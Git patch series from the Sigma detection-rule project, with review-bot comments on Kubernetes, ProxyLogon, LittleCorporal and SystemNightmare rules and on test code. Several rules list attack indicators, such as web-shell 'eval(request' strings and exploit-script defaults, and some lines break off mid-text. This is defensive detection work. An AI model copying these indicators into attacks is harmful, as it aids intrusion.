@@ -0,0 +1,24 @@ +title: Google Cloud Kubernetes Secrets Modified or Deleted +id: 2f0bae2d-bf20-4465-be86-1311addebaa3 +description: Identifies when the Secrets are Modified or Deleted. +author: Austin Songer +status: experimental +date: 2021/08/09 +references: + - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging +logsource: + service: gcp.audit +detection: + selection: + eventName: + - io.k8s.core.v*.secrets.create + - io.k8s.core.v*.secrets.update + - io.k8s.core.v*.secrets.patch + - io.k8s.core.v*.secrets.delete + condition: selection +level: medium +tags: + - attack.credential_access +falsepositives: + - Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 711619e90e03dc939ecc0e4cc7607657f45682e2 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 10 Aug 2021 06:28:35 +0200 Subject: [PATCH 0283/1367] remove 'or' as not need --- rules/cloud/gcp_kubernetes_rolebinding.yml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/rules/cloud/gcp_kubernetes_rolebinding.yml b/rules/cloud/gcp_kubernetes_rolebinding.yml index d920ae69..c6da9214 100644 --- a/rules/cloud/gcp_kubernetes_rolebinding.yml +++ b/rules/cloud/gcp_kubernetes_rolebinding.yml 
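Review bot: `id: 2f0bae2d-bf20-4465-be86-1311addebaa3` is the same UUID used by `rules/cloud/gcp_kubernetes_rolebinding.yml` earlier in this series; rule ids must be unique across the repo, so generate a fresh one. The title says "Modified or Deleted" but the list includes `io.k8s.core.v*.secrets.create`, and `attack.credential_access` fits reading secrets (`get`/`list`) rather than writing them — either add the read methods and keep the tag, or retag the write/delete set as impact/defense evasion. As with the RoleBinding rule, `eventName` should be checked against the field name the other `gcp.audit` rules use.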
@@ -15,13 +15,13 @@ logsource: detection: selection: eventName: - - io.k8s.authorization.rbac.v*.clusterrolebindings.create or - - io.k8s.authorization.rbac.v*.rolebindings.create or - - io.k8s.authorization.rbac.v*.clusterrolebindings.patch or - - io.k8s.authorization.rbac.v*.rolebindings.patch or - - io.k8s.authorization.rbac.v*.clusterrolebindings.update or + - io.k8s.authorization.rbac.v*.clusterrolebindings.create + - io.k8s.authorization.rbac.v*.rolebindings.create + - io.k8s.authorization.rbac.v*.clusterrolebindings.patch + - io.k8s.authorization.rbac.v*.rolebindings.patch + - io.k8s.authorization.rbac.v*.clusterrolebindings.update - io.k8s.authorization.rbac.v*.rolebindings.update - - io.k8s.authorization.rbac.v*.clusterrolebindings.delete or + - io.k8s.authorization.rbac.v*.clusterrolebindings.delete - io.k8s.authorization.rbac.v*.rolebindings.delete condition: selection level: medium From 17c6fc7038b1bfb2e783ac0263581d55ee4e6c1d Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 10 Aug 2021 09:16:30 +0200 Subject: [PATCH 0284/1367] rule: ProxyLogon rule for MS Exchange --- .../win_exchange_proxylogon_oabvirtualdir.yml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml diff --git a/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml b/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml new file mode 100644 index 00000000..8dd5846d --- /dev/null +++ b/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml 
@@ -0,0 +1,26 @@ +title: ProxyLogon MSExchange OabVirtualDirectory +id: 550d3350-bb8a-4ff3-9533-2ba533f4a1c0 +status: experimental +description: Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invokation of Set-OabVirtualDirectory +references: + - https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c +author: Florian Roth +date: 2021/08/09 +logsource: + product: windows + service: msexchange-management +detection: + selection_cmdlet: + Message|contains|all: + - 'OabVirtualDirectory' + - ' -ExternalUrl ' + selection_params: + Message|contains: + - 'eval(request' + - 'http://f/ Date: Tue, 10 Aug 2021 10:21:22 +0200 Subject: [PATCH 0285/1367] add test_selection_list_one_value warning only --- tests/test_rules.py | 38 +++++++++++++++++++++++++++++++++++++- 1 file changed, 37 insertions(+), 1 deletion(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index 2f1a15dc..80936674 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py 
@@ -499,11 +499,47 @@ class TestRules(unittest.TestCase): def test_invalid_logsource_attributes(self): faulty_rules = [] + valid_logsource = [ + 'category', + 'product', + 'service', + 'definition', + ] for file in self.yield_next_rule_file_path(self.path_to_rules): logsource = self.get_rule_part(file_path=file, part_name="logsource") + valid = True for key in logsource: - if key.lower() not in ['category', 'product', 'service', 'definition']: + if key.lower() not in valid_logsource: print(Fore.RED + "Rule {} has a logsource with an invalid field ({})".format(file, key)) + valide = False + if not valid: + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + + "There are rules with non-conform 'logsource' fields. Please check: https://github.com/Neo23x0/sigma/wiki/Rule-Creation-Guide#logsource") + + def test_selection_list_one_value(self): + faulty_rules = [] + for file in self.yield_next_rule_file_path(self.path_to_rules): + detection = self.get_rule_part(file_path=file, part_name="detection") + if detection: + valid = True + for key in detection: + if isinstance(detection[key],list): + if len(detection[key]) == 1 and not isinstance(detection[key][0],str): #rule with only list of Keywords term + print(Fore.RED + "Rule {} has the selection ({}) with a list of only 1 value in detection".format(file, key)) + valid = False + if isinstance(detection[key],dict): + for sub_key in detection[key]: + if isinstance(detection[key][sub_key],list): #split in 2 if as get a error "int has not len()" + if len(detection[key][sub_key]) == 1: + print (Fore.RED + "Rule {} has the selection ({}/{}) with a list of only 1 value in detection".format(file, key, sub_key)) + valid = False + #if not valid: + # faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + "There are rules using list with only 1 value") + def get_mitre_data(): """ From e098cdf3a104dfacee9732989a97655850628905 Mon Sep 17 00:00:00 2001 
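Review bot: `valide = False` in the new `test_invalid_logsource_attributes` body is a typo — it binds a throw-away local instead of flipping `valid`, so `faulty_rules` is never populated and the assertion can never fail; change it to `valid = False`. The same misspelling is still visible as context in the later hunk `@@ -514,32 +549,32 @@` on this page. In `test_selection_list_one_value` the `faulty_rules.append(file)` is deliberately commented out (warning only, per the commit title), which is fine, but a short comment such as `# warning only for now: single-value lists are reported, not failed` would make that intent explicit in the code. The enclosing `TestRules` class starts outside the hunk.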
From: frack113 Date: Tue, 10 Aug 2021 11:07:28 +0200 Subject: [PATCH 0286/1367] fix url ref --- tests/test_rules.py | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index 80936674..81f16d8c 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -281,7 +281,7 @@ class TestRules(unittest.TestCase): faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + - "There are rules with malformed optional 'related' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)") + "There are rules with malformed optional 'related' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification#rule-identification)") def test_sysmon_rule_without_eventid(self): faulty_rules = [] @@ -348,7 +348,7 @@ class TestRules(unittest.TestCase): faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + - "There are rules with malformed 'status' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)") + "There are rules with malformed 'status' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification#status-optional)") def test_level(self): faulty_rules = [] @@ -369,7 +369,7 @@ class TestRules(unittest.TestCase): faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + - "There are rules with missing or malformed 'level' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)") + "There are rules with missing or malformed 'level' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification#level)") def test_optional_fields(self): faulty_rules = [] 
@@ -495,7 +495,7 @@ class TestRules(unittest.TestCase): faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + - "There are rules with non-conform 'title' fields. Please check: https://github.com/Neo23x0/sigma/wiki/Rule-Creation-Guide#title") + "There are rules with non-conform 'title' fields. Please check: https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide#title") def test_invalid_logsource_attributes(self): faulty_rules = [] @@ -516,7 +516,7 @@ class TestRules(unittest.TestCase): faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + - "There are rules with non-conform 'logsource' fields. Please check: https://github.com/Neo23x0/sigma/wiki/Rule-Creation-Guide#logsource") + "There are rules with non-conform 'logsource' fields. Please check: https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide#log-source") def test_selection_list_one_value(self): faulty_rules = [] @@ -528,15 +528,15 @@ class TestRules(unittest.TestCase): if isinstance(detection[key],list): if len(detection[key]) == 1 and not isinstance(detection[key][0],str): #rule with only list of Keywords term print(Fore.RED + "Rule {} has the selection ({}) with a list of only 1 value in detection".format(file, key)) - valid = False + #valid = False if isinstance(detection[key],dict): for sub_key in detection[key]: if isinstance(detection[key][sub_key],list): #split in 2 if as get a error "int has not len()" if len(detection[key][sub_key]) == 1: print (Fore.RED + "Rule {} has the selection ({}/{}) with a list of only 1 value in detection".format(file, key, sub_key)) - valid = False - #if not valid: - # faulty_rules.append(file) + #valid = False + if not valid: + faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + "There are rules using list with only 1 value") From 1437b1943ae52def4d98745ac54c6b91c2365db0 Mon Sep 17 00:00:00 2001 
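Review bot: In `@@ -528,15 +528,15 @@` both `valid = False` assignments are commented out while `if not valid: faulty_rules.append(file)` is re-enabled, so `valid` is always `True`, the append is unreachable and `self.assertEqual(faulty_rules, [], ...)` passes trivially. If the check is meant to stay warning-only, drop the flag and the assert; if it is meant to become a real check later, keep `valid = False` and gate the append behind an explicit toggle such as `warn_only = True` so the dead branch does not read as enforcement. The enclosing `test_selection_list_one_value` starts outside the hunk.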
From: frack113 Date: Tue, 10 Aug 2021 13:09:43 +0200 Subject: [PATCH 0287/1367] add web_cve_2021_26858_iis_rce.yml --- rules/web/web_cve_2021_26858_iis_rce.yml | 25 ++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/web/web_cve_2021_26858_iis_rce.yml diff --git a/rules/web/web_cve_2021_26858_iis_rce.yml b/rules/web/web_cve_2021_26858_iis_rce.yml new file mode 100644 index 00000000..4ce81174 --- /dev/null +++ b/rules/web/web_cve_2021_26858_iis_rce.yml @@ -0,0 +1,25 @@ +title: ProxyLogon Reset Virtual Directories Based On IIS log +id: effee1f6-a932-4297-a81f-acb44064fa3a +status: experimental +description: When exploiting this vulnerability with CVE-2021–26858, an SSRF attack is used to manipulate virtual directories +references: + - https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c +author: frack113 +date: 2021/08/10 +logsource: + product: windows + category: webserver + service: iis +detection: + selection: + http_method: 'POST' + http_code: 200 + url_path: '/ecp/DDI/DDIService.svc/SetObject' + Message|contains|all: + - 'schema=Reset' + - 'VirtualDirectory' + Username|endswith: '$' + condition: selection +falsepositives: + - Unlikely +level: critical \ No newline at end of file From 50ccd879044d226ed28f5611a9a3ebaaa42fe525 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 10 Aug 2021 13:16:45 +0200 Subject: [PATCH 0288/1367] fix title --- rules/web/web_cve_2021_26858_iis_rce.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/web/web_cve_2021_26858_iis_rce.yml b/rules/web/web_cve_2021_26858_iis_rce.yml index 4ce81174..d053cbe5 100644 --- a/rules/web/web_cve_2021_26858_iis_rce.yml +++ b/rules/web/web_cve_2021_26858_iis_rce.yml 
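Review bot: The `description` of the new `web_cve_2021_26858_iis_rce.yml` writes the identifier as `CVE-2021–26858` with a U+2013 en dash between year and number, so a text search for the ASCII id `CVE-2021-26858` will not find this rule and the id does not match the form used in the linked reference; use the plain hyphen. `falsepositives: - Unlikely` gives no hint of what legitimate activity resets Exchange virtual directories; one example of the expected administrative path would help triage when the rule fires.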
@@ -1,4 +1,4 @@ -title: ProxyLogon Reset Virtual Directories Based On IIS log +title: ProxyLogon Reset Virtual Directories Based On IIS Log id: effee1f6-a932-4297-a81f-acb44064fa3a status: experimental description: When exploiting this vulnerability with CVE-2021–26858, an SSRF attack is used to manipulate virtual directories From 1544a351a33f5f178fe13d3ade7bc7fab65715da Mon Sep 17 00:00:00 2001 From: Jon Galarneau Date: Tue, 10 Aug 2021 08:29:39 -0400 Subject: [PATCH 0289/1367] Correcting regex in win_modif_of_services_for_via_commandline.yml The ^ symbol designates the beginning of the string, but in this rule it is clearly intended to be the end of the string. --- .../win_modif_of_services_for_via_commandline.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml b/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml index 970b7c6d..85c78791 100644 --- a/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml +++ b/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml @@ -20,8 +20,8 @@ detection: selection_cmdline_2: CommandLine|re: '(?i)sc failure.*command=.*' selection_cmdline_3: - CommandLine|re: '(?i).*reg add.*(FailureCommand|ImagePath).*(\.sh|\.exe|\.dll|\.bin^|\.bat|\.cmd|\.js|\.msh^|\.reg^|\.scr|\.ps|\.vb|\.jar|\.pl).*' + CommandLine|re: '(?i).*reg add.*(FailureCommand|ImagePath).*(\.sh|\.exe|\.dll|\.bin$|\.bat|\.cmd|\.js|\.msh$|\.reg$|\.scr|\.ps|\.vb|\.jar|\.pl).*' condition: selection_cmdline_1 or selection_cmdline_2 or selection_cmdline_3 falsepositives: - unknown -level: medium \ No newline at end of file +level: medium From 6d869feb4315fd716dce42e3d5f0267a1a9c59ac Mon Sep 17 00:00:00 2001 
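Review bot: In the regex hunk for `win_modif_of_services_for_via_commandline.yml` only `\.bin$`, `\.msh$` and `\.reg$` are end-anchored while `\.sh`, `\.exe`, `\.dll`, `\.bat` and the rest are not, and nothing on the page explains the asymmetry; `\.ps` and `\.vb` are plausibly prefixes for `.ps1`/`.vbs`, but `\.sh` unanchored also matches any longer `.sh…` token. Either anchor the full-extension alternatives consistently or add a comment next to `selection_cmdline_3` stating why only those three carry `$`. The `$` anchors only work because the trailing `.*` can match the empty string, which is worth a word in the same comment.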
From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 10 Aug 2021 15:12:45 +0200 Subject: [PATCH 0290/1367] update modified --- .../win_modif_of_services_for_via_commandline.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml b/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml index 85c78791..05ee03d5 100644 --- a/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml +++ b/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml @@ -10,7 +10,7 @@ tags: - attack.t1058 author: Sreeman date: 2020/09/29 -modified: 2021/06/11 +modified: 2021/08/10 logsource: category: process_creation product: windows From 73a4bd74dc987aa6648373de3b27fcbb210de53d Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 10 Aug 2021 17:10:46 +0200 Subject: [PATCH 0291/1367] fix: FPs script exec from temp --- .../process_creation/win_susp_script_exec_from_temp.yml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_script_exec_from_temp.yml b/rules/windows/process_creation/win_susp_script_exec_from_temp.yml index 58a7ebdc..441139b0 100644 --- a/rules/windows/process_creation/win_susp_script_exec_from_temp.yml +++ b/rules/windows/process_creation/win_susp_script_exec_from_temp.yml @@ -6,6 +6,7 @@ references: - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ author: Florian Roth, Max Altgelt date: 2021/07/14 +modified: 2021/0810 tags: - attack.execution logsource: @@ -27,7 +28,10 @@ detection: - '%TMP%' - '%LocalAppData%\Temp' filter: - CommandLine|contains: ' >' + CommandLine|contains: + - ' >' + - 'Out-File' + - 'ConvertTo-Json' condition: selection and not filter falsepositives: - Administrative scripts 
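Review bot: The widened `filter` in `win_susp_script_exec_from_temp.yml` matches `' >'`, `'Out-File'` and `'ConvertTo-Json'` anywhere in `CommandLine`, so with `condition: selection and not filter` every script launched from a temp directory that also writes output is excluded, which is broader than the `Administrative scripts` false positive it targets. Consider tying the exclusion to the specific admin tooling observed (a parent image or a known script path) rather than to generic output redirection, or document in `falsepositives` that output-writing scripts are intentionally suppressed so the coverage gap is recorded.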
From e43b917dab76c4ca20dd38da14a6b1bde6825b28 Mon Sep 17 00:00:00 2001
From: frack113
Date: Tue, 10 Aug 2021 17:35:32 +0200
Subject: [PATCH 0292/1367] fix space error
---
 tools/config/winlogbeat-modules-enabled.yml | 70 ++++++++++-----------
 1 file changed, 35 insertions(+), 35 deletions(-)
diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml
index 0736a30f..e43f5ef5 100644
--- a/tools/config/winlogbeat-modules-enabled.yml
+++ b/tools/config/winlogbeat-modules-enabled.yml
@@ -508,40 +508,40 @@ fieldmappings: # # Microsoft-Windows-Windows Defender/Operational # - Action ID: winlog.event_data.Action ID - Action Name: winlog.event_data.Action Name - Additional Actions ID: winlog.event_data.Additional Actions ID - Additional Actions String: winlog.event_data.Additional Actions String - Category ID: winlog.event_data.Category ID - Category Name: winlog.event_data.Category Name - Detection ID: winlog.event_data.Detection ID - Detection Time: winlog.event_data.Detection Time - Detection User: winlog.event_data.Detection User - Engine Version: winlog.event_data.Engine Version - Error Code: winlog.event_data.Error Code - Error Description: winlog.event_data.Error Description - Execution ID: winlog.event_data.Execution ID - Execution Name: winlog.event_data.Execution Name + Action ID: winlog.event_data.Action\ ID + Action Name: winlog.event_data.Action\ Name + Additional Actions ID: winlog.event_data.Additional\ Actions\ ID + Additional Actions String: winlog.event_data.Additional\ Actions\ String + Category ID: winlog.event_data.Category\ ID + Category Name: winlog.event_data.Category\ Name + Detection ID: winlog.event_data.Detection\ ID + Detection Time: winlog.event_data.Detection\ Time + Detection User: winlog.event_data.Detection\ User + Engine Version: winlog.event_data.Engine\ Version + Error Code: winlog.event_data.Error\ Code + Error Description: winlog.event_data.Error\ Description + Execution ID: winlog.event_data.Execution\ ID + Execution Name: winlog.event_data.Execution\ Name FWLink: winlog.event_data.FWLink - New Value: winlog.event_data.New Value - Old Value: winlog.event_data.Old Value - Origin ID: winlog.event_data.Origin ID - Origin Name: winlog.event_data.Origin Name + New Value: winlog.event_data.New\ Value + Old Value: winlog.event_data.Old\ Value + Origin ID: winlog.event_data.Origin\ ID + Origin Name: winlog.event_data.Origin\ Name Path: winlog.event_data.Path - Post Clean Status: winlog.event_data.Post Clean Status - 
Pre Execution Status: winlog.event_data.Pre Execution Status - Process Name: winlog.event_data.Process Name - Product Name: winlog.event_data.Product Name - Product Version: winlog.event_data.Product Version - Remediation User: winlog.event_data.Remediation User - Security intelligence Version: winlog.event_data.Security intelligence Version - Severity ID: winlog.event_data.Severity ID - Severity Name: winlog.event_data.Severity Name - Source ID: winlog.event_data.Source ID - Source Name: winlog.event_data.Source Name - Status Code: winlog.event_data.Status Code - Status Description: winlog.event_data.Status Description - Threat ID: winlog.event_data.Threat ID - Threat Name: winlog.event_data.Threat Name - Type ID: winlog.event_data.Type ID - Type Name: winlog.event_data.Type Name + Post Clean Status: winlog.event_data.Post\ Clean\ Status + Pre Execution Status: winlog.event_data.Pre\ Execution\ Status + Process Name: winlog.event_data.Process\ Name + Product Name: winlog.event_data.Product\ Name + Product Version: winlog.event_data.Product\ Version + Remediation User: winlog.event_data.Remediation\ User + Security intelligence Version: winlog.event_data.Security\ intelligence\ Version + Severity ID: winlog.event_data.Severity\ ID + Severity Name: winlog.event_data.Severity\ Name + Source ID: winlog.event_data.Source\ ID + Source Name: winlog.event_data.Source\ Name + Status Code: winlog.event_data.Status\ Code + Status Description: winlog.event_data.Status\ Description + Threat ID: winlog.event_data.Threat\ ID + Threat Name: winlog.event_data.Threat\ Name + Type ID: winlog.event_data.Type\ ID + Type Name: winlog.event_data.Type\ Name From 63ead346e886ed2e2c8068c8e4d5f15dcbe93ba6 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 10 Aug 2021 19:09:34 +0200 Subject: [PATCH 0293/1367] fix modified value --- .../windows/process_creation/win_susp_script_exec_from_temp.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
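Review bot: The escaped values such as `winlog.event_data.Action\ ID` are unquoted YAML scalars, so the backslash is kept literally and the mapping now emits a Lucene query_string-style escaped field name; a backend that places the mapped name into a JSON DSL key (where a space needs no escaping) would receive the backslash as part of the field name — this is inferred from the mapping file alone and should be confirmed against the backends that consume `fieldmappings`. A comment above the block, e.g. `# field names containing spaces are escaped for the query_string syntax`, would record which consumer the escaping is for. The `fieldmappings` section continues outside the hunk.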
diff --git a/rules/windows/process_creation/win_susp_script_exec_from_temp.yml b/rules/windows/process_creation/win_susp_script_exec_from_temp.yml
index 441139b0..5389761e 100644
--- a/rules/windows/process_creation/win_susp_script_exec_from_temp.yml
+++ b/rules/windows/process_creation/win_susp_script_exec_from_temp.yml
@@ -6,7 +6,7 @@ references:
 - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/
 author: Florian Roth, Max Altgelt
 date: 2021/07/14
-modified: 2021/0810
+modified: 2021/08/10
 tags:
 - attack.execution
 logsource:
From 13c868d3fd1f63134daf951cd586905cf0781aa1 Mon Sep 17 00:00:00 2001
From: Young
Date: Tue, 10 Aug 2021 15:34:52 -0700
Subject: [PATCH 0294/1367] Added more helper functions and comments
---
 tools/sigma/backends/opensearch.py | 139 +++++++++++------------------
 1 file changed, 52 insertions(+), 87 deletions(-)
diff --git a/tools/sigma/backends/opensearch.py b/tools/sigma/backends/opensearch.py
index 825caa73..d202e58a 100644
--- a/tools/sigma/backends/opensearch.py
+++ b/tools/sigma/backends/opensearch.py
@@ -32,78 +32,14 @@ from sigma.config.mapping import ConditionalFieldMapping from .base import BaseBackend, SingleTextQueryBackend from .mixins import RulenameCommentMixin, MultiRuleOutputMixin from .exceptions import NotSupportedError -from .elasticsearch import DeepFieldMappingMixin, ElasticsearchWildcardHandlingMixin +from .elasticsearch import ElasticsearchQuerystringBackend from .defaultOpensearchValues import * -class OpenSearchQuerystringBackend(DeepFieldMappingMixin, ElasticsearchWildcardHandlingMixin, SingleTextQueryBackend): - """Converts Sigma rule into OpenSearch query string. Only searches, no aggregations.""" - identifier = "es-qs" - active = True - - reEscape = re.compile("([\s+\\-=!(){}\\[\\]^\"~:/]|(? Date: Mon, 9 Aug 2021 13:25:07 +0200 Subject: [PATCH 0295/1367] new rule LittleCorporal generated maldoc process injection --- ...sysmon_littlecorporal_generated_maldoc.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/windows/process_access/sysmon_littlecorporal_generated_maldoc.yml diff --git a/rules/windows/process_access/sysmon_littlecorporal_generated_maldoc.yml b/rules/windows/process_access/sysmon_littlecorporal_generated_maldoc.yml new file mode 100644 index 00000000..b9b54d10 --- /dev/null +++ b/rules/windows/process_access/sysmon_littlecorporal_generated_maldoc.yml 
@@ -0,0 +1,25 @@ +title: LittleCorporal Generated Maldoc Injection +id: 7bdde3bf-2a42-4c39-aa31-a92b3e17afac +description: Detects the process injection of a LittleCorporal generated Maldoc. +references: + - https://github.com/connormcgarr/LittleCorporal +status: experimental +author: Christian Burkard +date: 2021/08/09 +logsource: + category: process_access + product: windows +detection: + selection: + SourceImage|endswith: 'winword.exe' + CallTrace|contains|all: + - ':\Windows\Microsoft.NET\Framework64\v2.' + - 'UNKNOWN' + condition: selection +falsepositives: + - unkown +level: high +tags: + - attack.execution + - attack.t1204.002 + - attack.t1055.003 From c1f9c3373039f50b24ab1351a51bab4f41a4b892 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 11 Aug 2021 10:10:30 +0200 Subject: [PATCH 0296/1367] rule: SystemNightmare --- .../win_exploit_systemnightmare.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/windows/process_creation/win_exploit_systemnightmare.yml diff --git a/rules/windows/process_creation/win_exploit_systemnightmare.yml b/rules/windows/process_creation/win_exploit_systemnightmare.yml new file mode 100644 index 00000000..8f4c3727 --- /dev/null +++ b/rules/windows/process_creation/win_exploit_systemnightmare.yml @@ -0,0 +1,24 @@ +title: SystemNightmare Exploitation Script Execution +id: c01f7bd6-0c1d-47aa-9c61-187b91273a16 +status: experimental +description: Detects the exploitation of PrinterNightmare to get a shell as LOCAL_SYSTEM +references: + - https://github.com/GossiTheDog/SystemNightmare +author: Florian Roth +date: 2021/08/11 +tags: + - attack.privilege_escalation + - attack.t1068 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains: + - 'printnightmare.gentilkiwi.com' + - ' /user:gentilguest ' + - 'Kiwi Legit Printer' + condition: selection +falsepositives: + - Unknown +level: critical 
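Review bot: `falsepositives: - unkown` in `sysmon_littlecorporal_generated_maldoc.yml` is misspelled; use `- Unknown`, which also matches the capitalisation of the other new rules in this series. The `CallTrace|contains|all` pairing of the `Framework64\v2.` path fragment with `'UNKNOWN'` is the core of the detection, but the `description` does not say so; a sentence such as `Matches a process access from winword.exe whose call trace passes through the .NET v2 runtime and an UNKNOWN (presumably unbacked) frame` would tell analysts why both strings are required.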
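Review bot: The `description` of `win_exploit_systemnightmare.yml` says the rule detects PrinterNightmare exploitation, while the title, reference and indicators describe the SystemNightmare script; the three `CommandLine|contains` strings (`printnightmare.gentilkiwi.com`, ` /user:gentilguest `, `Kiwi Legit Printer`) are the published script's default values, so the rule is a signature for the unmodified tool rather than for the technique. State that in the description, e.g. `Detects execution of the SystemNightmare PoC script with its default printer, user and server names`, so the `critical` level is read as high-confidence but narrow coverage.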
From ff5c9116a474c21bc835f872870d52a5dbe277e2 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 11 Aug 2021 11:28:04 +0200 Subject: [PATCH 0297/1367] Update to w3c-logging --- rules/web/web_cve_2021_26858_iis_rce.yml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/rules/web/web_cve_2021_26858_iis_rce.yml b/rules/web/web_cve_2021_26858_iis_rce.yml index d053cbe5..eaddf371 100644 --- a/rules/web/web_cve_2021_26858_iis_rce.yml +++ b/rules/web/web_cve_2021_26858_iis_rce.yml @@ -9,17 +9,17 @@ date: 2021/08/10 logsource: product: windows category: webserver - service: iis + definition: w3c-logging must be enable https://docs.microsoft.com/en-us/windows/win32/http/w3c-logging detection: selection: - http_method: 'POST' - http_code: 200 - url_path: '/ecp/DDI/DDIService.svc/SetObject' - Message|contains|all: + cs-method: 'POST' + sc-status: 200 + cs-uri-stem|startswith: '/ecp/DDI/DDIService.svc/SetObject' + cs-uri-stem|contains|all: - 'schema=Reset' - 'VirtualDirectory' - Username|endswith: '$' + cs-username|endswith: '$' condition: selection falsepositives: - Unlikely -level: critical \ No newline at end of file +level: critical From 5e5ac8479c003b3bb461b20365088973caecb825 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 11 Aug 2021 14:26:20 +0200 Subject: [PATCH 0298/1367] Add tlp and target Attribute --- tests/test_rules.py | 117 +++++++++++++++++++++++++++--------------- tools/sigma/filter.py | 24 +++++++++ 2 files changed, 100 insertions(+), 41 deletions(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index 81f16d8c..cc53d85b 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py 
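Review bot: `definition: w3c-logging must be enable https://docs.microsoft.com/...` is the only place the rule states its prerequisite and it is ungrammatical; `definition: w3c-logging must be enabled, see https://docs.microsoft.com/en-us/windows/win32/http/w3c-logging`. `sc-status: 200` is an integer while every other selection value is a string; whether the backend mapping of the IIS status column is numeric is not visible here, so either quote it or document the expected type alongside the `definition`. The rule header and `id` are outside the hunk.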
@@ -251,7 +251,7 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with missing or malformed 'id' fields. Create an id (e.g. here: https://www.uuidgenerator.net/version4) and add it to the reported rule(s).") - + def test_optional_related(self): faulty_rules = [] valid_type = [ @@ -278,11 +278,11 @@ class TestRules(unittest.TestCase): #Only add one time if many bad type in the same file if type_ok == False: print(Fore.YELLOW + "Rule {} has a 'related/type' invalid value.".format(file)) - faulty_rules.append(file) + faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + - "There are rules with malformed optional 'related' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification#rule-identification)") - + "There are rules with malformed optional 'related' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)") + def test_sysmon_rule_without_eventid(self): faulty_rules = [] for file in self.yield_next_rule_file_path(self.path_to_rules): @@ -296,7 +296,7 @@ class TestRules(unittest.TestCase): found = True break if not found: - faulty_rules.append(file) + faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + "There are rules using sysmon events but with no EventID specified") @@ -310,10 +310,10 @@ class TestRules(unittest.TestCase): faulty_rules.append(file) elif not isinstance(datefield, str): print(Fore.YELLOW + "Rule {} has a malformed 'date' (should be YYYY/MM/DD).".format(file)) - 